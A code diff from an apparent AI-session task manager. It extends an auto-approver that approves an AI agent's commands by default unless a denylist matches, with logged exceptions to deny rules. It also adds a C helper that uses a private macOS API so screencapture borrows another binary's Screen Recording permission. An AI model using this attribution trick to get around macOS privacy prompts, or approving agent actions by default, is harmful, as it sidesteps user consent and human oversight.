     } catch (e) { console.error('[approval-agent] DB error:', e.message); }
     broadcastFn(sessionId, session, {
@@ -1944,6 +2246,10 @@ async function handleApprovalCheck(sessionId, session, cleanText, broadcastFn, p
     return true;
   }
   const userAllowed = !!(permMatch && permMatch.action === 'allow');
+  const viaException = userAllowed ? permMatch.viaException : null;
+  if (viaException) {
+    console.log(`[approval-agent] deny rule ${permMatch.rule} excepted (${viaException.type}: ${viaException.value}) session=${sessionId} cmd="${(context.command || '').slice(0, 200)}"`);
+  }
   // ── Allow-by-default ──────────────────────────────────────────────────────
   // Auto-approve everything not on the denylist. The blocklist above is the
@@ -1952,12 +2258,15 @@ async function handleApprovalCheck(sessionId, session, cleanText, broadcastFn, p
   // opinion on medium+ risk and can escalate. User-allowed commands skip it.
   const matchingRule = findMatchingRule(context);
   const heuristic = matchingRule ? null : reviewWithHeuristics(context);
-  const label = userAllowed ? `Allowed: ${permMatch.rule}`
+  const label = userAllowed
+    ? (viaException ? `Excepted from ${permMatch.rule} (${viaException.value})` : `Allowed: ${permMatch.rule}`)
     : matchingRule ? matchingRule.label : (heuristic.ruleLabel || context.toolName);
   const decidedBy = userAllowed ? 'user-allow' : (matchingRule ? 'rule' : 'auto');
   const riskLevel = matchingRule ? (matchingRule.risk_level || 'low') : (heuristic ? (heuristic.riskLevel || 'low') : 'low');
   const reasoning = userAllowed
-    ? `Permission Manager allow rule matched: ${permMatch.rule}`
+    ? (viaException
+        ? `Deny rule ${permMatch.rule} excepted (${viaException.type} ${viaException.value})`
+        : `Permission Manager allow rule matched: ${permMatch.rule}`)
     : matchingRule ? `Matched learned rule: ${matchingRule.label}`
     : 'Auto-approved by default (not on the denylist)';
@@ -2001,15 +2310,22 @@ async function handleApprovalCheck(sessionId, session, cleanText, broadcastFn, p
 module.exports = {
   parseApprovalContext,
   isLiveApprovalPrompt,
+  isPlanApprovalPrompt,
+  planCardFingerprint,
+  cardTextFingerprint,
   hasComposerStatusFooter,
   reviewWithHeuristics,
   _splitShellClauses,
   _isProcessControlClause,
+  _isControlFlowClause,
+  _stripLeadingControlKeyword,
+  _isDevCleanupCommand,
+  _isTmpScopedRmClause,
+  _isPortScopedKillClause,
   _buildSessionContext,
   normalizeCommandSignature,
   escalationCommandParts,
   classifyBlockReason,
-  _rescueCandidateActionable,
   findMatchingRule,
   getApproveKeystroke,
   sendApprovalKeystroke,
@@ -2020,4 +2336,8 @@ module.exports = {
   handleApprovalCheck,
   decideApproval,
   clearSessionDedup(sessionId) { _lastApproval.delete(sessionId); },
+  // Record that the human is manually driving `sessionId` right now, so the auto-approver
+  // backs off (see _userIsDriving / sendApprovalKeystroke). Called from server.js handleInput.
+  markUserActive(sessionId) { if (sessionId) _userActiveAt.set(sessionId, Date.now()); },
+  _userIsDriving,
 };

package/template/claude-task-manager/bin/ctm-disclaim.c ADDED Viewed

@@ -0,0 +1,42 @@
+// ctm-disclaim — run a command as its OWN TCC "responsible process".
+//
+// macOS attributes Screen Recording (and other TCC permissions) to the *responsible
+// process*, which children inherit from their parent — all the way up to the launchd
+// daemon. CTM runs from a self-signed .app bundle (com.walle.ctm) that macOS won't let a
+// background daemon grant a Screen Recording prompt for, so `screencapture` it spawns is
+// denied. But the user's real `node` binary is already granted Screen Recording.
+//
+// responsibility_spawnattrs_setdisclaim() (the same private spawn attribute LaunchServices
+// uses when it `open`s an app) breaks the inheritance: the spawned process becomes its own
+// responsible process. So `ctm-disclaim <real-node> -e "<run screencapture>"` makes that
+// node its own responsible identity (the granted "node"), and the screencapture it spawns
+// inherits that granted identity instead of com.walle.ctm.
+//
+// Usage: ctm-disclaim <command> [args...]   (exits with the command's exit status)
+#include <spawn.h>
+#include <sys/wait.h>
+#include <unistd.h>
+#include <stdio.h>
+extern int responsibility_spawnattrs_setdisclaim(posix_spawnattr_t *attrs, int disclaim);
+int main(int argc, char **argv, char **envp) {
+    if (argc < 2) {
+        fprintf(stderr, "usage: ctm-disclaim <command> [args...]\n");
+        return 2;
+    }
+    posix_spawnattr_t attr;
+    posix_spawnattr_init(&attr);
+    responsibility_spawnattrs_setdisclaim(&attr, 1);
+    pid_t pid;
+    int rc = posix_spawnp(&pid, argv[1], NULL, &attr, &argv[1], envp);
+    posix_spawnattr_destroy(&attr);
+    if (rc != 0) {
+        fprintf(stderr, "ctm-disclaim: spawn failed (%d)\n", rc);
+        return rc;
+    }
+    int status;
+    if (waitpid(pid, &status, 0) < 0) return 1;
+    return WIFEXITED(status) ? WEXITSTATUS(status) : 1;
+}